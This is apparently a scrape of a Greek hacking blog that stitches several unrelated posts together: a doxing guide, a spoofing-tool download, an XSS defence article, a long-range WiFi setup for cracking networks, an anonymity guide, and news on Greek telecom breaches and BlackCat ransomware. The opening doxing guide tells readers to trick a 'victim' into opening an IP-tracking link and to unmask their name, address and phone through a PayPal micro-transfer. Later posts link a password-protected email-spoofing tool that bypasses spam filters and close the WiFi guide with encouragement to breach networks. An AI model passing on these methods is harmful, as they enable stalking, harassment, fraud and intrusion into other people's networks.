Notepad (επεξεργαστής κειμένου, σημειωματάριο για παράδειγμα)

Αποκτήστε τη διεύθυνση IP.

Ένας πολύ εύκολος τρόπος για να αποκτήσετε τη διεύθυνση IP απο το θύμα σας, είναι να πάτε εδώ πέρα http://whatstheirip.com/  να βάλετε το email σας και θα σας στείλουν ένα σύνδεσμο.
Στέλνετε το σύνδεσμο αυτο στο άτομο που θέλετε και όταν το ανοίξει θα πάρετε την IP του.
Μπορείτε να του πείτε κάτι του τύπου, δες ρε φίλε εδώ πέρα τι λέει.. ετσι ώστε να το κάνετε να το ανοίξει.
Πήρατε και την ip του.

Τώρα, πάτε εδώ http://ipaddress.com και εισάγετε την ip του.
Θα σας δώσει κάποια τοποθεσία, τον ταχυδρομικό κώδικα, χώρα, ISP και το λειτουργικό σύστημα.
Οπότε συμπληρώνετε και αυτα στο σημειωματάριό σας και συνχίζετε.

Πως θα πάρετε το email και άλλες πληροφορίες?

Πηγαίνετε στο google και γράψτε “ΌΝΟΜΑ-ΕΠΩΝΥΜΟ@” για παράδειγμα Ηλίας Λαλας@.
Έτσι θα σας εμφανίσει μερικές πληροφορίες για αυτον οπως και τα προφιλ που μπορεί να έχει σε κάποιες ιστοσελίδες με αυτο το όνομα.
Ακόμα, αν είναι σε κάποια ιστοσελίδα γραμμένος με κάποιο ψευδώνυμο μπορείτε να αναζητήσετε και σε αυτην.
Έτσι κάπου σε αυτες τις πληροφορίες θα βρείτε και το email, η και απο εδώ http://knowem.com/

Αν δεν το βρείτε σε κανέναν λογαριασμό τότε, ψάξτε στο facebook αν έχει κρύψει τις πληροφορίες του, μπορεί να το ζητήσετε απο κάποιον φίλο.

Ότι πληροφορίες μαζέψατε τις γράφετε στο σημειωματάριό σας.

Χρησιμοποιώντας το paypal.

Ένας πιο εύκολος τρόπος είναι μέσα απο το paypal.
Το μόνο που χρειάζεται είναι να έχετε ένα paypal λογαριασμό, να ξέρετε το email του, και να έχετε υπόλοιπο έστω 0,01 ευρώ.
Και πως το εκμεταλλευόμαστε αυτο;
Απλά, αφου ξέρετε το email του κάνετε μεταφορά απο τη δικιά σας paypal στη δικιά του ένα μικρό ποσό (πχ 0,01 ευρώ) και αυτομάτως θα σας εμφανίσει Όνομα, διεύθυνση, τηλέφωνο, κλπ.

Πως θα αποκτήσετε παραπάνω πληροφορίες.
Αν έχετε κάποια φωτογραφία του μπορείτε να πάτε εδω http://tineye.com/ να τη βάλετε και θα σας εμφανίσει που ανήκει αυτη τη φωτογραφία και σε ποιον.
Πχ σε ένα λογαριασμό στο twitter με το όνομα Stamatis Dede.

Αν γνωρίζετε το όνομα είναι πιθανόν να βρείτε και τη διεύθυνση απο τις παρακάτω ιστοσελίδες
http://411.com
http://whitepages.com

Έχει κάποια δική του ιστοσελίδα;

Αν έχει κάποια δικιά του ιστοσελίδα μπορείτε να πάτε στο whois.domaintools.com και να σας εμφανίσει πληροφορίες για τον διαχειριστή της ιστοσελίδας.
Αν έχει βάλει απόκρυψη στα WHOIS δεν θα τα εμφανίσει.

Related posts:

Εγκατάσταση VPN στα Kali Linux Δωρεάν Verification χωρίς πραγματικό αριθμό τηλεφώνου. Δημιουργία ψεύτικου DOX για να προστατέψετε τον εαυτό σας Πως θα αλλάξετε τη διεύθυνση MAC στο Android κινητό σας

DezFake V4 | στείλετε ένα μήνυμα email από οποιοδήποτε email που σας αρέσει

Με αυτό το εργαλείο μπορείτε να στείλετε ένα μήνυμα ηλεκτρονικού ταχυδρομείου από οποιαδήποτε διεύθυνση ηλεκτρονικού ταχυδρομείου που σας αρέσει χωρίς να συνδεθείτε!

ΧΑΡΑΚΤΗΡΙΣΤΙΚΆ :
HTML Supported [✓]
Private Anonymous Server [✓]
Bypass Spam Filters [✓]

Κατέβασμα απο εδω

http://www.mediafire.com/download/job88p342uhvs92/DezFake_V4.0.rar
Κωδικός πρόσβασης: dezired

Related posts:

1337 Admin P4Ge Find3r v5 – The new version -The best Admin finder in the world Email Cracker v2 {UPDATED} Το Metasploit: Ένα Ισχυρό Εργαλείο για Την Κυβερνοασφάλεια Ρίξτε μια ματιά στο Κόσμο των Δικτύων με το Wireshark

Προστατεύοντας τον Ιστότοπό σας: Οι Αόρατοι Κίνδυνοι των Επιθέσεων XSS και Πώς να Αμυνθείτε

Οι επιθέσεις XSS, γνωστές και ως Cross-Site Scripting, αποτελούν σοβαρή απειλή για την ασφάλεια των ιστοσελίδων και των χρηστών τους. Στο παρόν άρθρο, θα εξετάσουμε τι είναι οι επιθέσεις XSS, πώς λειτουργούν και ποιοι τρόποι προστασίας μπορούν να υιοθετηθούν για να αποτραπεί η κακόβουλη εκμετάλλευσή τους.

Τι είναι η επίθεση XSS;

Η επίθεση XSS αναφέρεται σε καταστάσεις όπου κακόβουλος κώδικας JavaScript ενσωματώνεται σε μια ιστοσελίδα και εκτελείται στον φυλλομετρητή των χρηστών χωρίς τη συναίνεσή τους. Ο κακόβουλος κώδικας μπορεί να προέρχεται από εξωτερικές πηγές ή ακόμη και από τον ίδιο τον ιστότοπο, εάν τα εισαγόμα δεδομένα δεν ελέγχονται σωστά.

Οι επιθέσεις XSS διακρίνονται σε τρεις κατηγορίες:

1. Stored XSS: Ο κακόβουλος κώδικας αποθηκεύεται στη βάση δεδομένων του ιστότοπου και παραδίδεται στους χρήστες όταν επισκέπτονται τη σελίδα. Αυτή η μορφή επίθεσης μπορεί να έχει μακροχρόνιες συνέπειες.
2. Reflected XSS: Ο κακόβουλος κώδικας ενσωματώνεται σε URL ή φόρμες και εκτελείται κατά την αίτηση που κάνει ο χρήστης. Συνήθως, αυτές οι επιθέσεις επηρεάζουν μόνο τον συγκεκριμένο χρήστη.
3. DOM-based XSS: Αυτή η μορφή επίθεσης συμβαίνει στον πελάτη, όταν ο κακόβουλος κώδικας τροποποιεί το DOM (Document Object Model) της σελίδας, επηρεάζοντας έτσι την εμφάνιση ή τη συμπεριφορά της.

Πώς Λειτουργούν οι Επιθέσεις XSS;

Για να κατανοήσουμε πώς λειτουργούν οι επιθέσεις XSS, ας ρίξουμε μια ματιά στα βασικά στάδια:

Εισαγωγή Κακόβουλου Κώδικα: Ο επιτιθέμενος εισάγει κακόβουλο κώδικα (συνήθως JavaScript)

Στη συνέχεια, ας εξετάσουμε πώς μπορείτε να προστατευτείτε από αυτούς τους κινδύνους και να ενισχύσετε την ασφάλεια του ιστότοπού σας:

1. Είσοδος δεδομένων (Input Validation): Το πρώτο βήμα στην προστασία από επιθέσεις XSS είναι η προσεκτική εισαγωγή και επεξεργασία των δεδομένων που εισέρχονται στην ιστοσελίδα σας. Βεβαιωθείτε ότι εφαρμόζετε κανόνες εισαγωγής (input validation) και αποτρέπετε την εκτέλεση κώδικα που μπορεί να εισαχθεί από χρήστες.
2. Κωδικοποίηση εξόδου (Output Encoding): Κωδικοποίηση εξόδου είναι η διαδικασία με την οποία τα δεδομένα εξόδου, πριν αποσταλούν στον πελάτη, κωδικοποιούνται έτσι ώστε να μην εκτελεστούν ως κώδικας JavaScript. Χρησιμοποιήστε αξιόπιστες βιβλιοθήκες ή εργαλεία κωδικοποίησης εξόδου.
3. Content Security Policy (CSP): Το CSP είναι ένα ισχυρό εργαλείο ασφάλειας που επιτρέπει στους διαχειριστές ιστοσελίδων να καθορίσουν ποια περιεχόμενα μπορούν να εκτελεστούν σε μια σελίδα. Μπορείτε να ρυθμίσετε το CSP σας για να αποτρέψετε την εκτέλεση εξωτερικού JavaScript και άλλων πόρων.
4. Διαχείριση συνόδων (Session Management): Βεβαιωθείτε ότι οι συνεδρίες των χρηστών διαχειρίζονται με ασφάλεια και ότι οι πληροφορίες συνόδου δεν μπορούν να προσπελαστούν ή να τροποποιηθούν από κακόβουλους.
5. Ενημερωμένοι Φυλλομετρητές (Browsers): Ενθαρρύνετε τους χρήστες να χρησιμοποιούν ενημερωμένους φυλλομετρητές, καθώς πολλοί από αυτούς έχουν ενσωματωμένα μέτρα ασφαλείας κατά των επιθέσεων XSS.
6. Εκπαίδευση των Χρηστών: Εκπαιδεύστε τους χρήστες σας σχετικά με τους κινδύνους των επιθέσεων XSS και τη σημασία της προσοχής κατά την περιήγηση.
7. Αυτόματοι Ελεγκτές Ασφαλείας (Security Scanners): Χρησιμοποιήστε αυτόματους ελεγκτές ασφαλείας για να ανιχνεύσετε πιθανές ευπάθειες στον κώδικα της ιστοσελίδας σας.
8. Συνεχής Ενημέρωση: Η ασφάλεια των ιστοσελίδων είναι μια συνεχής προσπάθεια. Κρατήστε το λογισμικό, τον κώδικα, και τα CMS (Content Management Systems) σας ενημερωμένα σε τακτά χρονικά διαστήματα.

Αντιμετώπιση των Επιθέσεων XSS:

Αν παρόλα αυτά εκτελεστεί μια επίθεση XSS στον ιστότοπό σας, είναι σημαντικό να ξέρετε πώς να αντιμετωπίσετε την κατάσταση:

1. Κατανόηση της Επίθεσης: Πρέπει να κατανοήσετε πώς λειτούργησε η επίθεση και ποια δεδομένα εκτελέστηκαν. Αυτό σας επιτρέπει να αντιδράσετε αποτελεσματικότερα.
2. Κλείσιμο της Ευπάθειας: Βεβαιωθείτε ότι κλείνετε την ευπάθεια στον κώδικα σας που επέτρεψε την επίθεση. Αυτό μπορεί να σημαίνει την τροποποίηση του κώδικα ή την απενεργοποίηση προσωρινά του επιρρέποντος τμήματος του ιστότοπου.
3. Ανάλυση Κακόβουλου Κώδικα: Εξετάστε τον κακόβουλο κώδικα που χρησιμοποιήθηκε στην επίθεση για να κατανοήσετε τις πιθανές συνέπειες και να αντιμετωπίσετε τυχόν επιπτώσεις.
4. Καταγραφή Και Αναφορά: Καταγράψτε την επίθεση και αναφέρετέ την στις κατάλληλες αρχές ασφαλείας. Αυτό μπορεί να βοηθήσει να προστατευτείτε από περαιτέρω επιθέσεις και να βελτιώσετε την ασφάλεια του ιστότοπου σας.
5. Ενημέρωση των Χρηστών: Ενημερώστε τους χρήστες σας για το περιστατικό και τα μέτρα που λαμβάνετε για την αντιμετώπισή του.
6. Εφαρμογή Παρακολούθησης (Monitoring): Χρησιμοποιήστε λογισμικό παρακολούθησης κίνησης και ασφαλείας για να εντοπίζετε πρόωρα επιθέσεις και ανωμαλίες στην κίνηση της ιστοσελίδας σας.

Οι επιθέσεις XSS αποτελούν μια σοβαρή απειλή για την ασφάλεια του ιστότοπού σας και των χρηστών σας. Με την εφαρμογή σωστών πρακτικών ασφαλείας και την ενημέρωση για τις τρέχουσες απειλές, μπορείτε να προστατεύσετε τον ιστότοπό σας από αυτούς τους κινδύνους.

Φίλτρα:

Για να προστατευτείτε από επιθέσεις XSS, μπορείτε να χρησιμοποιήσετε διάφορα φίλτρα και μέτρα ασφαλείας στον κώδικα της ιστοσελίδας σας. Αυτά τα φίλτρα θα σας βοηθήσουν να ελέγξετε την εισερχόμενη και εξερχόμενη πληροφορία για πιθανούς κώδικες XSS. Εδώ είναι μερικά από τα βασικά μέτρα που μπορείτε να λάβετε:

1. Εισαγωγή δεδομένων (Input Validation): Επιβεβαιώστε ότι τα δεδομένα που εισάγονται από τους χρήστες στην ιστοσελίδα σας ελέγχονται για ανεπιθύμητους χαρακτήρες και κωδικούς πριν τα αποθηκεύσετε ή τα εμφανίσετε. Χρησιμοποιήστε λειτουργίες όπως htmlspecialchars() για την κωδικοποίηση εισόδου.
2. Κωδικοποίηση εξόδου (Output Encoding): Κωδικοποιήστε την εξαγόμενη πληροφορία πριν την εμφανίσετε στους χρήστες. Χρησιμοποιήστε τη σωστή συνάρτηση κωδικοποίησης, όπως htmlspecialchars() για τον HTML κώδικα και json_encode() για τα δεδομένα JSON.
3. Content Security Policy (CSP): Ρυθμίστε μια αποτρεπτική πολιτική CSP που να περιορίζει τις εκτελούμενες πηγές κώδικα στον ιστότοπό σας. Μπορείτε να καταχωρίσετε ποιοι πόροι επιτρέπονται και απαγορεύονται, όπως τα scripts από εξωτερικούς διακομιστές.
4. Εσωτερική Λειτουργία Escape: Χρησιμοποιήστε εσωτερικές λειτουργίες αποτροπής των επιθέσεων XSS που παρέχονται από το framework ή το περιβάλλον ανάπτυξης που χρησιμοποιείτε (όπως htmlspecialchars() σε PHP).
5. Βελτιωμένη Αυθεντικοποίηση (Authentication): Ενισχύστε το σύστημα αυθεντικοποίησης για τους χρήστες σας και βεβαιωθείτε ότι διαχειρίζεστε την πρόσβαση στις προστατευμένες περιοχές του ιστότοπου σας με ασφάλεια.
6. Παρακολούθηση και Συνεχής Ενημέρωση: Χρησιμοποιήστε λογισμικό παρακολούθησης και συνεχώς ενημερώνετε τον κώδικα σας για να αντιμετωπίσετε νέες απειλές και ευπάθειες.

Αυτά τα μέτρα συνιστούν ένα ισχυρό σύνολο πρακτικών για την προστασία από επιθέσεις XSS.

Βεβαιωθείτε ότι εφαρμόζετε αυτά τα μέτρα ασφαλείας σε όλα τα μέρη της ιστοσελίδας σας, συμπεριλαμβανομένων των πεδίων εισόδου, των φορμών επικοινωνίας, των σχολίων χρηστών και άλλων σημείων που εμφανίζουν πληροφορίες από τους χρήστες.

Επιπλέον, αξίζει να σημειωθεί ότι το καλύτερο μέτρο προστασίας είναι η συνεχής ενημέρωση και η εφαρμογή των καλών πρακτικών ασφαλείας στην ανάπτυξη και τη συντήρηση του ιστότοπού σας. Επίσης, πρέπει να είστε ενήμεροι για τις τρέχουσες απειλές και να αναθεωρείτε τα μέτρα σας ασφαλείας κατά τακτά χρονικά διαστήματα.

Επιπλέον, εάν χρησιμοποιείτε πλατφόρμες διαχείρισης περιεχομένου (CMS) όπως το WordPress, υπάρχουν πολλά πρόσθετα (plugins) και επεκτάσεις που μπορείτε να χρησιμοποιήσετε για την αυτόματη εφαρμογή ορισμένων από αυτά τα μέτρα ασφαλείας.

Το να προστατεύσετε τον ιστότοπό σας από επιθέσεις XSS είναι κρίσιμης σημασίας για την ασφάλεια των χρηστών σας και τη φήμη του ιστότοπού σας. Εφαρμόστε τα παραπάνω μέτρα ασφαλείας και παρακολουθήστε συνεχώς τον ιστότοπό σας για ενδεχόμενες αδυναμίες ασφαλείας.

Related posts:

CSRF: Όταν οι Κρυφές Επιθέσεις Κατά των Δικτυακών Εφαρμογών απειλούν την Ασφάλειά μας Προστατεύοντας την Επιχείρησή σας: Η Σημασία της Κυβερνοασφάλειας Υποκλοπή Cookies: Προστατεύοντας την Ιδιωτικότητά σας στον Ψηφιακό Κόσμο Το Metasploit: Ένα Ισχυρό Εργαλείο για Την Κυβερνοασφάλεια

Πως να πιάσετε συχνότητα WiFI ακτίνας 2-5 Χιλιομέτρων ( + Amplified Aircrack )

Γενικές Πληροφορίες

Σε αυτόν τον οδηγό θα σας δείξω πως μπορείτε να πιάσετε σήμα WiFi  σε ακτίνα 2 – 5 χιλιομέτρων. Τώρα θα μου πει κάποιος είναι εφικτό αυτό; Φυσικά και ναι. Οπότε πάω στον οδηγό κατευθείαν.

Τι Θα χρειαστούμε;

Αρχικά θα χρειαστούμε κάποια πράγματα προς αγορά για να τελέσουμε τον οδηγό μας και φυσικά κοστίζουν καθώς είναι υλικά αγαθά οπότε έχουμε και λέμε.

1. Yagi Antenna Είναι τύπος κεραίας ώστε να πιάσουμε μεγάλες συχνότητες. ( RP-SMA connector / DBI ) 

2. WiFi Amplifilter  ( 8W Max Singal ) 

3. WiFi Adapter ( ALFA )

Και τώρα αφού έχουμε αγοράσει όλα τα απαραίτητα θα πάμε στον οδηγό μας. 

1. Συνδέουμε τον αντάπτορα του WiFi με το RP-SMA Cable.

2. Συνδέουμε το RP-SMA Cable με τον WiFi Amplifier. 

4. Βγάζουμε τον Yagi Antenna έξω θα είναι κάπως έτσι. ( Καλύτερα θα ήταν να τον βάλετε σε ψηλό σημείο για καλύτερη αναμετάδοση ) 

Και τέλος  Συνδέστε το wifi-Amp με την πηγή τροφοδοσίας.

Είστε έτοιμη να παραβιάσετε δίκτυα μέσω Aircrack και ακόμα να κάνετε Packet Injection από το σπίτι σας.

Related posts:

Ιδεολογία Hacking Διαφορές Hacker με Cracker Γιατί η αγορά ενός crypter μπορεί να αποβεί άχρηστη ? Δωρεάν Verification χωρίς πραγματικό αριθμό τηλεφώνου.

Οδηγός για πλήρης ανωνυμία στο διαδίκτυο

ΣΗΜΕΙΩΣΗ Αν σας ενδιαφέρει η προστασία της ιδιωτικής ζωής στο Internet τότε πρέπει να πάρετε αυτόν τον οδηγό πολύ σοβαρά. Το παραμικρό λάθος, θα μπορούσε να φανερώσει όλα τα στοιχειά σας στο Internet Επίσης, πλέον όλες η μεγάλες εταιρίες περνούν τα στοιχειά σας, η έλλειψη γνώσης σας για το ίντερνετ μπορεί να σας προδώσει, και η NSA να σας παρακολουθεί και να ξέρει τα πάντα για εσάς.

DNS

Αυτό το πρόγραμμα σας δίνει τη δυνατότητα να χρησιμοποιήσετε τους διακομιστές DNS του OpenDNS, αντί του ISP σας.  Κρυπτογραφεί επίσης το σύνολο της κίνησης DNS ανάμεσα σε εσάς και το διακομιστή OpenDNS.

Ο ISP σας μπορεί να σας παρακολουθεί, ή ακόμα και κάποιος στο ίδιο δίκτυο. Ακόμα με μια ευπάθεια στον υπολογιστή σας θα μπορούσανε να παρακολουθούνε όλα τα πακέτα που στέλνονται.

Μπορεί επίσης να χρησιμοποιείτε ένα VPN, και να έχετε μια διαρροή DNS, όπου μπορεί να σας προδώσει.

Η ιστοσελίδα “Έλεγχος Διαρροής DNS” μπορεί να χρησιμοποιηθεί για να ελέγξει αν υπάρχουν διαρροές.

Κατεβάστε και εγκαταστήστε το DNSCrypt, και αλλάξτε τις ρυθμίσεις σας όπως στην παρακάτω εικόνα

Ιδιωτική περιήγηση

Η λειτουργία Ιδιωτικής Περιήγησης σάς επιτρέπει να πλοηγηθείτε στο διαδίκτυο χωρίς να αποθηκεύονται πληροφορίες σχετικά με το ποιές ιστοσελίδες έχετε επισκεφθεί

Τι δεν αποθηκεύει η Ιδιωτική Περιήγηση;

Σελίδες που έχετε επισκεφθεί[/b]: Δε θα εισαχθεί καμία σελίδα στη λίστα ιστοτόπων που υπάρχουν στο μενού του ιστορικού, στη λίστα του ιστορικού που υπάρχει μέσα στο παράθυρο “Βιβλιοθήκη”, ή στη λίστα διευθύνσεων που εμφανίζονται αυτόματα στη Γραμμή Διευθύνσεων.

Πληροφορίες που εισάγονται σε Φόρμα ή στη Γραμμή Αναζήτησης: Τίποτα απ’ όλα όσα πληκτρολογείτε σε πλαίσια κειμένου που υπάρχουν σε ιστοσελίδες δεν αποθηκεύεται, όπως επίσης και στη Γραμμή αναζήτησης ή στη Φόρμα αυτόματης συμπλήρωσης.

Κωδικούς πρόσβασης: Κανένας νέος κωδικός πρόσβασης δε θα αποθηκευτεί.

Καταχωρήσεις στη Λίστα Ληφθέντων Αρχείων: Κανένα αρχείο από αυτά που κατεβάσατε δε θα υπάρχει στην καρτέλα Λήψεις αρχείων μετά την απενεργοποίηση της λειτουργίας Ιδιωτικής Περιήγησης.

Cookies: Τα cookies αποθηκεύουν πληροφορίες σχετικά με τους ιστότοπους που επισκέπτεσθε, όπως προτιμήσεις σελίδων, κατάσταση σύνδεσης, και δεδομένα που χρησιμοποιούνται από πρόσθετα όπως το Adobe Flash. Τα cookies μπορούν ακόμη να χρησιμοποιηθούν από τρίτους για να ανιχνεύσουν την περιήγησή σας στο διαδίκτυο.

Αρχεία προσωρινής μνήμης διαδικτύου, αρχεία χωρίς σύνδεση και δεδομένα χρήστη: Κανένα προσωρινό αρχείο διαδικτύου, ή προσωρινά αποθηκευμένο αρχείο από ιστοσελίδες, όπως επίσης και κανένα αρχείο, από αυτά τα οποία αποθηκεύουν οι ιστότοποι για εργασία χωρίς σύνδεση, δε θα αποθηκευτεί.

• Ανοίγουμε τον ιστοπλοηγό Mozilla Firefox.

• Κάνουμε αριστερό κλίκ στο μενού: Εργαλεία

• Στο μενού που εμφανίζει, επιλέγουμε:

• Έναρξη ιδιωτικής περιήγησης

• Στο παράθυρο που θα εμφανιστεί πατάμε το κουμπάκι: Έναρξη ιδιωτικής περιήγησης.

• Αν κάναμε τα βήματα μέχρι εδώ τότε ένα παράθυρο θα ανοίξει και θα υπάρχει αυτή η εικόνα σε διάφορα μεγέθη.

• Μπράβο μπήκαμε με επιτυχία σε κατάσταση ανώνυμης περιήγησης.

E-MAIL

Η όλη ιδέα του ηλεκτρονικού ταχυδρομείου είναι πολύ παλιά και άσκοπη κατά τη γνώμη μου.

Θα έλεγα ότι ίσως το 70% της χρήσης του ηλεκτρονικού ταχυδρομείου είναι να ελέγξει εσάς, ή να σας προσθέσει σε μια λίστα.

Είναι ένα κακό πρωτόκολλο επικοινωνίας και σχεδόν κάθε γνωστός πάροχο web mail κρατάει logs έτσι ώστε να τα ξέρουν όλα για τη ζωή σας.

Οι μεγάλες εταιρίες, όπως το Gmail, Hotmail και το Yahoo, είναι οι χειρότερες για την προστασία της ιδιωτικής ζωής.

Εάν δεν θέλετε να χρησιμοποιήσετε το ηλεκτρονικό ταχυδρομείο, όπως εγώ, μπορείτε να αρνηθείτε να δημιουργήσετε μια διεύθυνση ηλεκτρονικού ταχυδρομείου, και απλά να χρησιμοποιήσετε μια προσωρινή διεύθυνση ηλεκτρονικού ταχυδρομείου.

Ο πιο ασφαλής τρόπος για τη χρήση ηλεκτρονικού ταχυδρομείου, θα ήταν να χρησιμοποιήσετε κρυπτογράφηση PGP.[/b]

Δείτε τα παρακάτω

FORWARD EMAIL

• NotSharingMyInfo

TEMPORARY EMAIL

•  GuerrillaMail

•  YOPMail

PERMANANT EMAIL

•  HushMail

•  SafeMail

•  TORMail

SPOOF EMAIL

•  AnonyMailer

•  DeadFake

•  Emkei

KeyScrambler

Το πρόγραμμα αυτό κρυπτογραφεί όλες τις πληκτρολογήσεις σας, καθιστώντας αδύνατο για ένα keylogger, ή οποιοδήποτε λογισμικό παρακολούθησης να ξέρει τι πληκτρολογείτε.

Κατεβάστε και εγκαταστήστε KeyScrambler (Ίσως χρειαστεί να κάνετε επανεκκίνηση.), Και κάντε δεξί κλικ στο εικονίδιο του προγράμματος, και κάντε κλικ στο “Επιλογές”. Αλλάξτε τις ρυθμίσεις σας, έτσι ώστε να είναι όπως οι παρακάτω εικόνες:

ΣΗΜΕΙΩΣΗ: Η δωρεάν έκδοση θα κρυπτογραφήσει μόνο ότι πληκτρολογείτε στο web browser σας.

ΑΛΛΑΞΤΕ ΤΗΝ MAC ADRESS

Αυτό το πρόγραμμα θα σας επιτρέψει να αλλάξετε τη mac διεύθυνση σας. (Όχι, αυτό δεν έχει να κάνει με έναν υπολογιστή Mac.)

Κατεβάστε και εγκαταστήστε το  http://www.technitium.com/tmac/index.html TMAC, και κάντε το εκτέλεση.

Για κάθε σύνδεση στην ενότητα “Network Connection“, το επισημάνετε, και στη συνέχεια κάντε κλικ στο κουμπί “Random MAC Address” και στη συνέχεια κάντε κλικ στο κουμπί “Change Now».

PeerBlock

Αυτό το πρόγραμμα θα μπλοκάρει κάθε εισερχόμενη και εξερχόμενη κίνηση.

Κατεβάστε και εγκαταστήστε το PeerBlock, και στη συνέχεια πρέπει να το εκτελέσετε. Στην αρχή, θα σας ζητηθεί τι είδους IP θέλετε να αποκλείσετε. Επιλέξτε τα πάντα, εκτός από το “Import/Create Lists” και “Always Allow HTTP”.

ΣΗΜΕΙΩΣΗ: Το πρόγραμμα μπορεί να εμποδίσει την πρόσβαση σε ορισμένες ιστοσελίδες, χωρίς να καταλάβετε γιατί είναι αποκλεισμένες. Αν μια ιστοσελίδα δεν φορτώσει, τότε κάνετε τερματισμό του Peerblock, και όταν τελειώσετε τότε το ανοίγετε ξανά

Κάτω από την καρτέλα “Settings”, αλλάξετε τις ρυθμίσεις σας όπως στην παρακάτω εικόνα:

Related posts:

Εγκατάσταση VPN στα Kali Linux Doxing Βασικές πληροφορίες-Ξεκίνημα Δωρεάν Verification χωρίς πραγματικό αριθμό τηλεφώνου. Δημιουργία ψεύτικου DOX για να προστατέψετε τον εαυτό σας

Επίθεση τύπου Sql Inection (ΑΠΕΙΛΕΣ ΚΑΙ ΠΡΟΣΤΑΣΙΑ)

Η έγχυση SQL (SQL Injection) χρησιμοποιείται στο πλαίσιο μιας επίθεσης σε εφαρμογές που αποθηκεύουν και διαχειρίζονται τα δεδομένα τους μέσω ενός Συστήματος Διαχείρισης Βάσης Δεδομένων. Χρησιμοποιώντας αυτή την τεχνική ο επιτιθέμενος εκμεταλλεύται μια ευπάθεια της εφαρμογής και εισάγει κακόβουλο SQL κώδικα σε σημεία όπου η εφαρμογή περιμένει θεμιτά δεδομένα από τον χρήστη.^[1] Μια τέτοια ευπάθεια προκύπτει στην περίπτωση που η εφαρμογή δεν διαθέτει έναν μηχανισμό που να φιλτράρει σωστά τα δεδομένα εισόδου του χρήστη. Λ.χ. δεν ψάχνει για τυχόν χαρακτήρες διαφυγής εμφωλευμένους μέσα στο αίτημα ενός χρήστη ή δεν υπάρχει αυστηρός έλεγχος των τύπων των δεδομένων που εισάγει ο χρήστης.

Οι επιθέσεις έγχυσης SQL επιτρέπουν σε έναν επιτιθέμενο να έχει πρόσβαση σε απόρρητα δεδομένα, να μπορεί επεξεργαστεί διαβαθμισμένα δεδομένα, να διαγράψει δεδομένα, να γίνει διαχειριστής του εξυπηρετητή της βάσης δεδομένων αλλά και να αποκτήσει πρόσβαση σε υπολογιστικούς πόρους με προνόμια διαχειριστή.

Data Breach για εκατομμύρια χρήστες κινητής τηλεφωνίας

Οι χάκερς κάνουν πάρτι με τα δεδομένα εκατομμυρίων χρηστών τη στιγμή που η δικαιοσύνη κάνει τα στραβά μάτια και η ΑΔΑΕ τους τιμωρεί με χάδια.

Έδωσαν 756.700 ρούτερ με κοινούς κωδικούς πρόσβασης 

Απόφαση 316/2020 (pdf ΕΔΩ)

 Δεν τηρούνται αρχεία με το ποιος μπαίνει στο σύστημα

Απόφαση 51/2022 (pdf ΕΔΩ)

 Καταγγελία κατά Vodafone και FORTHNET

Στη Δικαιοσύνη η υπόθεση από Φλωρά και ποινικές διώξεις 

Αθώωση κατηγορουμένου αλλά χωρίς υποστήριξη της κατηγορίας 

Επιστολή που απέστειλε προς την εισαγγελέα του Αρείου Πάγου (pdf ΕΔΩ)

Πρόστιμα 7,2 εκατ. ευρώ, κέρδη δισεκατομμυρίων ευρώ 

Πηγή: datajournalists.co.uk

Related posts:

Χάκερς παραβίασαν τα συστήματα του Διεθνούς Ποινικού Δικαστηρίου την περασμένη εβδομάδα 38TB δεδομένων εκτέθηκαν κατά λάθος από τους ερευνητές AI της Microsoft Τα πάντα σχετικά με το RFID και τις νέες ταυτότητες Αλήθειες και μύθοι σχετικά με το hacking

Η BlackCat ransomware μολύνει το Azure Storage με το Sphynx encryptor

Η BlackCat ransomware (ALPHV) χρησιμοποιεί τώρα κλεμμένους λογαριασμούς της Microsoft και τον Sphynx encryptor για να κρυπτογραφήσει το Azure cloud των στόχων της.

Κατά τη διερεύνηση μιας πρόσφατης παραβίασης, οι υπεύθυνοι αντιμετώπισης περιστατικών της Sophos X-Ops ανακάλυψαν ότι οι επιτιθέμενοι χρησιμοποίησαν μια νέα παραλλαγή του Sphynx με πρόσθετη υποστήριξη για τη χρήση προσαρμοσμένων διαπιστευτηρίων.

Αφού απέκτησαν πρόσβαση στο λογαριασμό Sophos Central χρησιμοποιώντας έναν κλεμμένο κωδικό πρόσβασης μίας χρήσης (OTP), απενεργοποίησαν την προστασία παραβίασης και τροποποίησαν τις πολιτικές ασφαλείας. Αυτές οι ενέργειες ήταν δυνατές μετά την κλοπή του OTP από το LastPass του θύματος χρησιμοποιώντας την επέκταση LastPass Chrome.

Στη συνέχεια, κρυπτογράφησαν τα συστήματα του πελάτη της Sophos και την απομακρυσμένη αποθήκευση στο cloud Azure και προσέθεσαν την επέκταση .zk09cvt σε όλα τα κλειδωμένα αρχεία. Συνολικά, οι χειριστές του ransomware μπόρεσαν να κρυπτογραφήσουν επιτυχώς 39 λογαριασμούς Azure Storage.

Διείσδυσαν στο Azure portal του θύματος χρησιμοποιώντας ένα κλεμμένο κλειδί Azure που τους παρείχε πρόσβαση στους στοχευμένους λογαριασμούς. Τα κλειδιά που χρησιμοποιήθηκαν στην επίθεση εισήχθησαν μέσα στο δυαδικό πρόγραμμα ransomware αφού κωδικοποιήθηκαν με χρήση Base64.

Οι επιτιθέμενοι χρησιμοποίησαν επίσης πολλαπλά εργαλεία απομακρυσμένης παρακολούθησης και διαχείρισης (RMM), όπως τα AnyDesk, Splashtop και Atera, καθ’ όλη τη διάρκεια της εισβολής.

Η Sophos ανακάλυψε την παραλλαγή Sphynx τον Μάρτιο του 2023 κατά τη διάρκεια μιας έρευνας για μια παραβίαση δεδομένων που είχε ομοιότητες με μια άλλη επίθεση που περιγράφεται σε μια έκθεση της IBM-Xforce που δημοσιεύθηκε τον Μάιο (το εργαλείο ExMatter χρησιμοποιήθηκε για την εξαγωγή των κλεμμένων δεδομένων και στις δύο περιπτώσεις).

Η Microsoft διαπίστωσε επίσης τον περασμένο μήνα ότι ο νέος Sphynx encryptor ενσωματώνει το εργαλείο hacking Remcom και το framework δικτύωσης Impacket για μετακίνηση σε παραβιασμένα δίκτυα.

Ως επιχείρηση ransomware που εμφανίστηκε τον Νοέμβριο του 2021, το BlackCat/ALPHV είναι ύποπτο ότι είναι μια νέα επωνυμία της DarkSide/BlackMatter.

Γνωστή αρχικά ως DarkSide, η ομάδα αυτή συγκέντρωσε την παγκόσμια προσοχή μετά την παραβίαση του Colonial Pipeline, προσελκύοντας άμεσα τον έλεγχο των διεθνών υπηρεσιών επιβολής του νόμου.

